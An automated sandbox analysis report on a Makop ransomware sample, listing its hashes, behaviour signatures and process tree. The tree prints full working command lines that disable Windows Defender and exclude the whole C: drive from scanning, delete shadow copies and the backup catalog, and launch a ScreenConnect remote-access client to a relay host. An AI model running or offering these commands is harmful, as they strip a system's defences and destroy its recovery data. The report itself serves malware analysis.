Analysis

  • max time kernel
    125s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    26-12-2021 05:07

General

  • Target

    c540c9b5b467d575f46433b78237f6e1.exe

  • Size

    109KB

  • MD5

    c540c9b5b467d575f46433b78237f6e1

  • SHA1

    93dd622dc1268f598a47fe7c75efbce355097b98

  • SHA256

    5f5d1f324ed8dc18d76f200a176d40ab2ae48e336f33c2f7b5d047d682f3260a

  • SHA512

    29776896e4e5eef318389c3b618afe1a1ccb83e4eb41c42bcb108576a50953d760696bcf7531331678e00284a2d0320dba553070a2e0cc3bd7896802e82c9190

Malware Config

Signatures

  • MAKOP ransomware payload 4 IoCs
  • Makop

    Ransomware family discovered by @VK_Intel in early 2020.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Downloads MZ/PE file
  • Executes dropped EXE 6 IoCs
  • Loads dropped DLL 31 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 10 IoCs
  • Drops file in Windows directory 22 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 32 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c540c9b5b467d575f46433b78237f6e1.exe
    "C:\Users\Admin\AppData\Local\Temp\c540c9b5b467d575f46433b78237f6e1.exe"
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Modifies system certificate store
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:864
    • C:\Windows\SysWOW64\cmd.exe
      "cmd" /C cmd /c reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f & reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring $true" & dism /online /disable-feature /featurename:windows-defender /remove /norestart /quiet & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue" & c:\windows\system32\windowspowershell\v1.0\powershell.exe "Add-MpPreference -ExclusionPath C:\ -ErrorAction SilentlyContinue"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1656
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:432
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          4⤵
            PID:2016
        • C:\Windows\SysWOW64\reg.exe
          reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
          3⤵
            PID:2004
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring $true"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1988
          • C:\Windows\SysWOW64\Dism.exe
            dism /online /disable-feature /featurename:windows-defender /remove /norestart /quiet
            3⤵
            • Drops file in Windows directory
            PID:1208
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1560
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:308
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1736
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1732
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1968
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:432
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1692
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1888
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1080
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1720
          • \??\c:\windows\SysWOW64\windowspowershell\v1.0\powershell.exe
            c:\windows\system32\windowspowershell\v1.0\powershell.exe "Add-MpPreference -ExclusionPath C:\ -ErrorAction SilentlyContinue"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1136
        • C:\Windows\SysWOW64\cmd.exe
          "cmd" /C timeout 10
          2⤵
            PID:804
            • C:\Windows\SysWOW64\timeout.exe
              timeout 10
              3⤵
              • Delays execution with timeout.exe
              PID:1076
          • C:\Windows\tasks\MpResult.exe
            "C:\Windows\tasks\MpResult.exe"
            2⤵
            • Executes dropped EXE
            PID:2004
            • C:\Windows\system32\WerFault.exe
              C:\Windows\system32\WerFault.exe -u -p 2004 -s 524
              3⤵
              • Program crash
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1476
          • C:\Windows\SysWOW64\cmd.exe
            "cmd" /C timeout 30
            2⤵
              PID:2008
              • C:\Windows\SysWOW64\timeout.exe
                timeout 30
                3⤵
                • Delays execution with timeout.exe
                PID:1284
            • C:\Windows\tasks\SA.exe
              "C:\Windows\tasks\SA.exe"
              2⤵
              • Executes dropped EXE
              • Drops file in Windows directory
              • Suspicious behavior: EnumeratesProcesses
              PID:1080
              • C:\Windows\tasks\SA.exe
                "C:\Windows\tasks\SA.exe" n1080
                3⤵
                • Executes dropped EXE
                PID:1536
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe"
                3⤵
                  PID:1720
                  • C:\Windows\system32\vssadmin.exe
                    vssadmin delete shadows /all /quiet
                    4⤵
                    • Interacts with shadow copies
                    PID:1616
                  • C:\Windows\system32\wbadmin.exe
                    wbadmin delete catalog -quiet
                    4⤵
                    • Deletes backup catalog
                    PID:924
                  • C:\Windows\System32\Wbem\WMIC.exe
                    wmic shadowcopy delete
                    4⤵
                      PID:1092
                • C:\Windows\SysWOW64\msiexec.exe
                  "C:\Windows\System32\msiexec.exe" /i "C:\Windows\tasks\0.msi"
                  2⤵
                  • Enumerates connected drives
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of FindShellTrayWindow
                  PID:1412
              • C:\Windows\system32\vssvc.exe
                C:\Windows\system32\vssvc.exe
                1⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:840
              • C:\Windows\system32\msiexec.exe
                C:\Windows\system32\msiexec.exe /V
                1⤵
                • Enumerates connected drives
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies data under HKEY_USERS
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:692
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding C785D976AD9FA515F342E1F1D071DC67 C
                  2⤵
                  • Loads dropped DLL
                  PID:1900
                  • C:\Windows\SysWOW64\rundll32.exe
                    rundll32.exe "C:\Users\Admin\AppData\Local\Temp\MSI1352.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_259462266 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                    3⤵
                    • Loads dropped DLL
                    PID:1972
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding B6D68DC15C0E38A49FDFDBADE9C9DDA8
                  2⤵
                  • Loads dropped DLL
                  PID:588
                • C:\Windows\syswow64\MsiExec.exe
                  C:\Windows\syswow64\MsiExec.exe -Embedding 7F8112C2C14327E4C85E3D81CDAEDEFC M Global\MSI0000
                  2⤵
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  PID:1184
              • C:\Windows\system32\wbengine.exe
                "C:\Windows\system32\wbengine.exe"
                1⤵
                  PID:1380
                • C:\Windows\System32\vdsldr.exe
                  C:\Windows\System32\vdsldr.exe -Embedding
                  1⤵
                    PID:1656
                  • C:\Windows\System32\vds.exe
                    C:\Windows\System32\vds.exe
                    1⤵
                      PID:2016
                    • C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.ClientService.exe
                      "C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=instance-ik5pej-relay.screenconnect.com&p=443&s=a60c552f-9f0b-4dd5-904c-0ccd9212fff8&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zVeSGMrM9tjSmcGjFMIuyURXojoZNENzG7UM5aZF%2bqcw53mTJ4uRjJ7my742YfqvdqEv0F%2bvBqtPkyvQZQX7VKjWOs6KX89pV65ae014dBdhqIRQ%2feUjAx2MFIBKuSBNdhWUbkELS0qKb1oPsVIzst%2bHhgTLE3nWh5ag8s1Lvgy02hG5HM0ay%2bi1TowXRq9%2faSRe1qoK9SYcwuxU0zXzPl7tkshPvA7Z8jpsvcOBRNMz3fhBgbq7kDY%2bt4RbC50OHi%2fvku3xupvBXBKD0JnIaElhg2ICDmR3qr2TmKEwXQMIurOfpE9dng26klJNU8JNeytupnkksxce%2fyzzvPeo&t=&c=&c=&c=&c=&c=&c=&c=&c="
                      1⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Modifies data under HKEY_USERS
                      • Suspicious behavior: EnumeratesProcesses
                      PID:2072
                      • C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe
                        "C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe" "RunRole" "7358460f-4c3a-441d-96b2-94870076e8e9" "User"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:2260
                      • C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe
                        "C:\Program Files (x86)\ScreenConnect Client (2331eacb4b64e014)\ScreenConnect.WindowsClient.exe" "RunRole" "903263a8-03af-48f0-a774-9d77c6079200" "System"
                        2⤵
                        • Executes dropped EXE
                        • Checks processor information in registry
                        • Enumerates system info in registry
                        • Modifies data under HKEY_USERS
                        PID:2336

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • memory/864-56-0x0000000000860000-0x0000000000880000-memory.dmp

                      Filesize

                      128KB

                    • memory/864-55-0x0000000000860000-0x0000000000880000-memory.dmp

                      Filesize

                      128KB

                    • memory/864-57-0x00000000021E0000-0x00000000021E1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1476-121-0x0000000001D70000-0x0000000001D71000-memory.dmp

                      Filesize

                      4KB

                    • memory/1476-120-0x000007FEFB781000-0x000007FEFB783000-memory.dmp

                      Filesize

                      8KB

                    • memory/1720-108-0x00000000022F0000-0x0000000002F3A000-memory.dmp

                      Filesize

                      12.3MB

                    • memory/1732-86-0x0000000002591000-0x0000000002592000-memory.dmp

                      Filesize

                      4KB

                    • memory/1732-85-0x0000000002590000-0x0000000002591000-memory.dmp

                      Filesize

                      4KB

                    • memory/1732-87-0x0000000002592000-0x0000000002594000-memory.dmp

                      Filesize

                      8KB

                    • memory/1736-77-0x00000000023D0000-0x00000000023D1000-memory.dmp

                      Filesize

                      4KB

                    • memory/1736-78-0x00000000023D1000-0x00000000023D2000-memory.dmp

                      Filesize

                      4KB

                    • memory/1736-79-0x00000000023D2000-0x00000000023D4000-memory.dmp

                      Filesize

                      8KB

                    • memory/1972-150-0x0000000004833000-0x0000000004834000-memory.dmp

                      Filesize

                      4KB

                    • memory/1972-154-0x0000000004834000-0x0000000004835000-memory.dmp

                      Filesize

                      4KB

                    • memory/1972-149-0x0000000004831000-0x0000000004832000-memory.dmp

                      Filesize

                      4KB

                    • memory/1972-148-0x0000000004830000-0x0000000004831000-memory.dmp

                      Filesize

                      4KB

                    • memory/1972-155-0x0000000004835000-0x0000000004837000-memory.dmp

                      Filesize

                      8KB

                    • memory/1972-147-0x0000000000850000-0x000000000085A000-memory.dmp

                      Filesize

                      40KB

                    • memory/1972-144-0x00000000007A0000-0x00000000007CE000-memory.dmp

                      Filesize

                      184KB

                    • memory/1972-153-0x0000000002160000-0x00000000021D2000-memory.dmp

                      Filesize

                      456KB

                    • memory/1988-63-0x0000000075421000-0x0000000075423000-memory.dmp

                      Filesize

                      8KB

                    • memory/1988-64-0x0000000002440000-0x000000000308A000-memory.dmp

                      Filesize

                      12.3MB

                    • memory/2004-118-0x00000000003F0000-0x00000000003F8000-memory.dmp

                      Filesize

                      32KB

                    • memory/2004-117-0x00000000003F0000-0x00000000003F8000-memory.dmp

                      Filesize

                      32KB

                    • memory/2072-181-0x0000000000450000-0x000000000045E000-memory.dmp

                      Filesize

                      56KB

                    • memory/2072-194-0x0000000003C60000-0x0000000003DF8000-memory.dmp

                      Filesize

                      1.6MB

                    • memory/2072-190-0x0000000000F90000-0x0000000001002000-memory.dmp

                      Filesize

                      456KB

                    • memory/2072-186-0x0000000000C20000-0x0000000000C4C000-memory.dmp

                      Filesize

                      176KB

                    • memory/2072-197-0x0000000003280000-0x000000000330E000-memory.dmp

                      Filesize

                      568KB

                    • memory/2072-178-0x0000000000450000-0x000000000045E000-memory.dmp

                      Filesize

                      56KB

                    • memory/2072-199-0x0000000003942000-0x0000000003943000-memory.dmp

                      Filesize

                      4KB

                    • memory/2072-198-0x0000000003940000-0x0000000003941000-memory.dmp

                      Filesize

                      4KB

                    • memory/2072-200-0x0000000003943000-0x0000000003945000-memory.dmp

                      Filesize

                      8KB

                    • memory/2260-203-0x00000000003C0000-0x00000000003EC000-memory.dmp

                      Filesize

                      176KB

                    • memory/2260-202-0x00000000010C0000-0x000000000114E000-memory.dmp

                      Filesize

                      568KB

                    • memory/2260-204-0x0000000000440000-0x00000000004B2000-memory.dmp

                      Filesize

                      456KB

                    • memory/2260-205-0x000000001B140000-0x000000001B2D8000-memory.dmp

                      Filesize

                      1.6MB

                    • memory/2260-206-0x0000000000A40000-0x0000000000A42000-memory.dmp

                      Filesize

                      8KB

                    • memory/2260-207-0x0000000000400000-0x000000000040E000-memory.dmp

                      Filesize

                      56KB

                    • memory/2336-209-0x00000000010C0000-0x000000000114E000-memory.dmp

                      Filesize

                      568KB

                    • memory/2336-210-0x00000000002D0000-0x00000000002FC000-memory.dmp

                      Filesize

                      176KB

                    • memory/2336-211-0x0000000000460000-0x00000000004D2000-memory.dmp

                      Filesize

                      456KB

                    • memory/2336-212-0x000000001B300000-0x000000001B498000-memory.dmp

                      Filesize

                      1.6MB

                    • memory/2336-213-0x0000000000300000-0x000000000030E000-memory.dmp

                      Filesize

                      56KB

                    • memory/2336-214-0x000000001B840000-0x000000001B842000-memory.dmp

                      Filesize

                      8KB